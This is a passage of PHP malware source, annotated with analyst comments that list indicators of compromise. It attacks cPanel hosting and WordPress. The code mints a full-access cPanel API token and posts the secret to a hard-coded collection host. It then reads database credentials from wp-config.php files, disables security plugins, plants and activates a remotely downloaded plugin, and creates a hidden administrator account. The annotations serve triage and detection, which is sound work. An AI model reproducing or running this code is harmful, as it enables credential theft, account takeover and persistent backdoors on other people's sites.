1. CPANEL TOKEN
";
// Analyst note: this section tries to mint a full-access cPanel API token from inside a
// web-served PHP process. It is hostile code; the comments describe behaviour and the
// artifacts it leaves so that an affected account can be triaged.
// Normalise the working directory to forward slashes.
$cwd = str_replace('\\', '/', getcwd());
// Default docroot guess, built from the owner of the running PHP process.
$homedir = "/home/" . get_current_user() . "/public_html";
// If the cwd starts with /home, /home2, ... followed by one path segment, use that prefix instead.
if (preg_match('~^(/home\d*?/[^/]+)~', $cwd, $m)) {
$homedir = $m[1] . "/public_html";
}
// Shell command: invokes the cPanel `uapi` CLI (bare name, then two absolute paths) to create a
// full-access API token named "xshikata"; 2>&1 folds stderr into the captured output.
// Indicator: an API token with this name on the account, and a PHP worker spawning `uapi`.
$cmd = "(uapi Tokens create_full_access name=xshikata || /usr/bin/uapi Tokens create_full_access name=xshikata || /usr/local/cpanel/bin/uapi Tokens create_full_access name=xshikata) 2>&1";
$output = "";
$used_method = "None";
// Table of six PHP process-execution functions, keyed by function name. Each closure runs the
// command and returns its output as a string; every call carries @ to suppress warnings.
$methods = [
'shell_exec' => function($c) { return @shell_exec($c); },
'exec' => function($c) { @exec($c, $o); return implode("\n", $o); },
// passthru/system print directly, so output buffering is used to capture what they emit.
'passthru' => function($c) { ob_start(); @passthru($c); return ob_get_clean(); },
'system' => function($c) { ob_start(); @system($c); return ob_get_clean(); },
'popen' => function($c) { $h = @popen($c, 'r'); if($h) { $o = stream_get_contents($h); @pclose($h); return $o; } return null; },
'proc_open' => function($c) {
// Only the child's stdout pipe is read; the stderr pipe is opened and closed unread.
$d = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
$p = @proc_open($c, $d, $pipes);
if (is_resource($p)) { $o = stream_get_contents($pipes[1]); @fclose($pipes[1]); @fclose($pipes[2]); @proc_close($p); return $o; }
return null;
}
];
// Try each function that function_exists() reports. The last non-empty output is kept in $output;
// the loop stops at the first output mentioning a token or a name conflict, and only then is
// $used_method set. Hosts that restrict these functions narrow the paths available here.
foreach ($methods as $name => $func) {
if (function_exists($name)) {
$res = $func($cmd);
if (!empty($res)) {
$output = $res;
if (stripos($res, 'token:') !== false || stripos($res, 'conflicting') !== false || stripos($res, 'already exists') !== false) {
$used_method = $name;
break;
}
}
}
}
// Classify the captured command output into one of three outcomes. The $display_color values
// are CSS class names used by the page markup that is not visible in this listing.
$token_val = "";
$display_status = "UNKNOWN";
$display_color = "text-secondary";
// Case 1: output contains "token: <value>" - the secret of a newly created API token is captured.
// From this point the token must be treated as disclosed and revoked.
if(preg_match('/token:\s*(\S+)/i', $output, $m)) {
$token_val = trim($m[1]);
$display_status = "CREATED";
$display_color = "text-success";
// Case 2: a token with that name already exists. No secret is returned, so a placeholder string
// is stored; this outcome suggests the script (or a sibling) has run on the account before.
} elseif (stripos($output, 'conflicting') !== false || stripos($output, 'already exists') !== false) {
$token_val = "Exists (Secret Hidden)";
$display_status = "ALREADY EXISTS";
$display_color = "text-warning";
// Case 3: neither pattern matched (no usable output from any execution function).
} else {
$display_status = "NOT FOUND";
$display_color = "text-danger";
}
// Exfiltration step: runs only when a new token secret was captured above.
$server_response = "Skipped";
$srv_color = "text-secondary";
if ($display_status === "CREATED" && !empty($token_val)) {
// Hard-coded collection endpoint. Network indicator: outbound HTTPS POST from the web server
// to this host and path.
$target_url = "https://stepmomhub.com/catch.php";
// Payload: the request's Host header, the PHP process owner, the token secret and the docroot guess.
$data_json = json_encode([
"domain" => $_SERVER['HTTP_HOST'],
"username" => get_current_user(),
"apiToken" => $token_val,
"homedir" => $homedir
]);
$raw_response = "No Connect";
// Preferred transport: cURL, JSON body, 10 second timeout. Certificate and hostname verification
// are both switched off, so the request proceeds whatever certificate the remote end presents.
if (function_exists('curl_init')) {
$ch = curl_init($target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data_json);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$raw_response = curl_exec($ch);
curl_close($ch);
// Fallback transport: PHP stream wrapper, used when cURL is absent and allow_url_fopen is on.
// Peer verification is disabled here as well.
} elseif (ini_get('allow_url_fopen')) {
$opts = ['http' => ['method'=>'POST', 'header'=>'Content-Type: application/json', 'content'=>$data_json, 'timeout'=>10], 'ssl'=>['verify_peer'=>false, 'verify_peer_name'=>false]];
$raw_response = @file_get_contents($target_url, false, stream_context_create($opts));
}
// The endpoint is expected to answer with JSON carrying a 'status' field ('success', 'ignored',
// or anything else plus 'msg'); a non-JSON reply is shown truncated to 50 bytes.
$json_res = json_decode($raw_response, true);
if ($json_res) {
if ($json_res['status'] === 'success') { $server_response = "Saved to Database."; $srv_color = "text-success"; }
elseif ($json_res['status'] === 'ignored') { $server_response = "Already Saved (Duplicate)."; $srv_color = "text-warning"; }
else { $server_response = "Server Error: " . $json_res['msg']; $srv_color = "text-danger"; }
} else { $server_response = "Raw: " . substr($raw_response, 0, 50); }
// Token name already taken: nothing is sent because no secret was obtained.
} elseif ($display_status === "ALREADY EXISTS") {
$server_response = "Skipped (Secret Hidden)"; $srv_color = "text-warning";
}
// Operator-facing status output. The surrounding markup appears to have been stripped from this
// listing, so only the text content of each echo remains.
// Line 1: which execution function produced a usable result, and the token outcome.
echo "
Method: $used_method | Token: $display_status
";
// Line 2: result of the upload step.
echo "
Server: $server_response
";
// On failure, the first 200 bytes of raw command output are shown, HTML-escaped.
if ($display_status === "NOT FOUND") { $clean_out = htmlspecialchars(substr($output, 0, 200)); echo "
$clean_out
"; }
// Heading for the second stage, which targets WordPress installs.
echo "
2. WP ADMIN CREATOR
";
// Analyst note: second stage. For every wp-config.php found under $target it plants a plugin,
// activates it by editing the database, and creates or resets an administrator account.
// Artifacts to look for on an affected host: user login "xshikata", a plugin directory
// wp-content/plugins/system-core/, plugin directories renamed with a "_killed_<timestamp>"
// suffix, master_core_*.php / master_index_*.php in the temp directory, and outbound requests
// to the hosts named below. Database credentials in each wp-config.php were read by this code
// and should be treated as exposed.
// scan_smart_stream() and $target are defined outside this listing; presumably the helper
// collects wp-config.php paths under $target into $targets - confirm against its definition.
$targets = [];
scan_smart_stream($target, $targets);
$targets = array_unique($targets);
if (empty($targets)) {
echo "
No wp-config.php found in this path.
";
} else {
// Hard-coded account planted in each site: login, password value and e-mail.
// The password value is an unsalted MD5 hex digest written straight into user_pass below.
$au = 'xshikata';
$ap = md5('Lulz1337');
$ae = 'topupgameku.id@gmail.com';
// Remote source of the planted plugin, and the folder/file names it is installed under.
$plugin_src = 'https://raw.githubusercontent.com/baseng1337/damn/refs/heads/main/system-core.php';
$plugin_folder_name = 'system-core';
$plugin_filename = 'system-core.php';
// "folder/file" entry as it will appear in the active_plugins option.
$plugin_hook = $plugin_folder_name . '/' . $plugin_filename;
// Second collection endpoint and the shared value sent with each registration.
$receiver_url = 'https://stepmomhub.com/wp/receiver.php';
$receiver_key = 'wtf';
// Both remote files are downloaded once into the system temp directory, named with the current
// Unix time, and copied from there into each site. No cleanup of these files is visible here.
$master_core = sys_get_temp_dir() . '/master_core_' . time() . '.php';
$master_index = sys_get_temp_dir() . '/master_index_' . time() . '.php';
$ua = stream_context_create(['http'=>['header'=>"User-Agent: Mozilla/5.0"]]);
$src_core = @file_get_contents($plugin_src, false, $ua);
$src_idx = @file_get_contents('https://raw.githubusercontent.com/baseng1337/damn/refs/heads/main/index.php', false, $ua);
if($src_core) file_put_contents($master_core, $src_core);
if($src_idx) file_put_contents($master_index, $src_idx);
foreach ($targets as $cfg) {
// x_read() and get_conf_val_smart() are defined outside this listing; presumably they read the
// config file and extract the named constant's value - confirm against their definitions.
$raw = x_read($cfg);
if (!$raw) continue;
$dh = get_conf_val_smart($raw, 'DB_HOST');
$du = get_conf_val_smart($raw, 'DB_USER');
$dp = get_conf_val_smart($raw, 'DB_PASSWORD');
$dn = get_conf_val_smart($raw, 'DB_NAME');
// Table prefix: default wp_, overridden by the $table_prefix assignment when one is found.
$pre = 'wp_';
if (preg_match("/\\\$table_prefix\s*=\s*['\"]([^'\"]+)['\"]/", $raw, $m)) $pre = $m[1];
$wp_root_path = dirname($cfg);
$disp = str_replace($target, '', $wp_root_path);
echo "
";
echo "Dir: " . ($disp?:'/') . " -> ";
// Connect to the site's own database with the credentials taken from its config file;
// mysqli error reporting is turned off and the connect timeout is 2 seconds.
@mysqli_report(MYSQLI_REPORT_OFF);
$cn = mysqli_init();
@mysqli_options($cn, MYSQLI_OPT_CONNECT_TIMEOUT, 2);
if (@mysqli_real_connect($cn, $dh, $du, $dp, $dn)) {
$plugins_dir = $wp_root_path . '/wp-content/plugins/';
// Defence evasion: the directories of five security plugins are renamed with a
// "_killed_<unix time>" suffix, which presumably stops WordPress from loading them.
// A plugin directory carrying that suffix is a strong indicator of this script.
$targets_to_kill = ['wordfence', 'ithemes-security-pro', 'sucuri-scanner', 'sg-security', 'limit-login-attempts-reloaded'];
foreach ($targets_to_kill as $folder) {
$path = $plugins_dir . $folder;
if (is_dir($path)) { @rename($path, $path . '_killed_' . time()); }
}
// Plant the downloaded files as wp-content/plugins/system-core/system-core.php and index.php
// (directory mode 0755, plugin file mode 0644).
$target_folder = $plugins_dir . $plugin_folder_name;
$target_file = $target_folder . '/' . $plugin_filename;
$index_file = $target_folder . '/index.php';
if (!is_dir($target_folder)) { @mkdir($target_folder, 0755, true); @chmod($target_folder, 0755); }
$deploy_ok = false;
if (file_exists($master_core) && @copy($master_core, $target_file)) {
@chmod($target_file, 0644);
if (file_exists($master_index)) @copy($master_index, $index_file);
$deploy_ok = true;
}
$act_ok = false; $user_ok = false;
if ($deploy_ok) {
// Activation bypasses the WordPress admin: the serialized active_plugins option is read,
// the planted entry appended, and the row deleted and re-inserted as a hex literal.
$qopt = @mysqli_query($cn, "SELECT option_value FROM {$pre}options WHERE option_name='active_plugins'");
$current_plugins = ($qopt && mysqli_num_rows($qopt) > 0) ? @unserialize(mysqli_fetch_assoc($qopt)['option_value']) : [];
if (!is_array($current_plugins)) $current_plugins = [];
if (!in_array($plugin_hook, $current_plugins)) {
$current_plugins[] = $plugin_hook;
sort($current_plugins);
$hex_data = bin2hex(serialize($current_plugins));
@mysqli_query($cn, "DELETE FROM {$pre}options WHERE option_name='active_plugins'");
if (@mysqli_query($cn, "INSERT INTO {$pre}options (option_name, option_value, autoload) VALUES ('active_plugins', 0x$hex_data, 'yes')")) $act_ok = true;
} else { $act_ok = true; }
}
// Account step (runs whether or not the plugin was deployed): if the login already exists its
// password is overwritten, otherwise a new row is inserted into the users table.
$q1 = @mysqli_query($cn, "SELECT ID FROM {$pre}users WHERE user_login='$au'");
if ($q1 && mysqli_num_rows($q1) > 0) {
$uid = mysqli_fetch_assoc($q1)['ID'];
@mysqli_query($cn, "UPDATE {$pre}users SET user_pass='$ap' WHERE ID=$uid");
$user_ok = true;
} else {
@mysqli_query($cn, "INSERT INTO {$pre}users (user_login,user_pass,user_nicename,user_email,user_status,display_name) VALUES ('$au','$ap','Admin','$ae',0,'Admin')");
$uid = mysqli_insert_id($cn);
if($uid) $user_ok = true;
}
// Privilege step: usermeta rows give that user the administrator role and user_level 10.
if($user_ok) {
$cap = serialize(['administrator'=>true]);
@mysqli_query($cn, "INSERT INTO {$pre}usermeta (user_id,meta_key,meta_value) VALUES ($uid,'{$pre}capabilities','$cap') ON DUPLICATE KEY UPDATE meta_value='$cap'");
@mysqli_query($cn, "INSERT INTO {$pre}usermeta (user_id,meta_key,meta_value) VALUES ($uid,'{$pre}user_level','10') ON DUPLICATE KEY UPDATE meta_value='10'");
}
// Call-home step: the site's URL is read from the siteurl option and POSTed to the receiver
// endpoint. Network indicator: form-encoded POST with action=register_site to that host.
$ping_res = "-";
$surl = "";
$qurl = @mysqli_query($cn, "SELECT option_value FROM {$pre}options WHERE option_name='siteurl'");
if ($qurl && mysqli_num_rows($qurl)>0) $surl = mysqli_fetch_assoc($qurl)['option_value'];
if (!empty($surl)) {
$pdata_direct = http_build_query(['action'=>'register_site', 'secret'=>$receiver_key, 'domain'=>$surl, 'api_user'=>'', 'api_pass'=>'']);
$ctx_direct = stream_context_create(['http'=>['method'=>'POST','header'=>"Content-type: application/x-www-form-urlencoded",'content'=>$pdata_direct,'timeout'=>2]]);
@file_get_contents($receiver_url, false, $ctx_direct);
// When activation succeeded, the planted index.php is requested once over HTTP. "OK" is
// recorded without inspecting the response. Access-log indicator: a GET for
// /wp-content/plugins/system-core/index.php shortly after the files appear.
if ($act_ok) {
$trigger_url = rtrim($surl, '/') . '/wp-content/plugins/' . $plugin_folder_name . '/index.php';
$ctx_trig = stream_context_create(['http'=>['method'=>'GET','header'=>"User-Agent: Mozilla/5.0",'timeout'=>2]]);
@file_get_contents($trigger_url, false, $ctx_trig);
$ping_res = "OK";
}
}
// Per-site status line for the operator.
echo $deploy_ok ? "PLG:OK " : "PLG:ERR ";
echo $user_ok ? "USR:OK " : "USR:ERR ";
echo "PING:$ping_res";
mysqli_close($cn);
} else {
echo "DB CONN FAIL";
}
echo "
";
}
}
echo "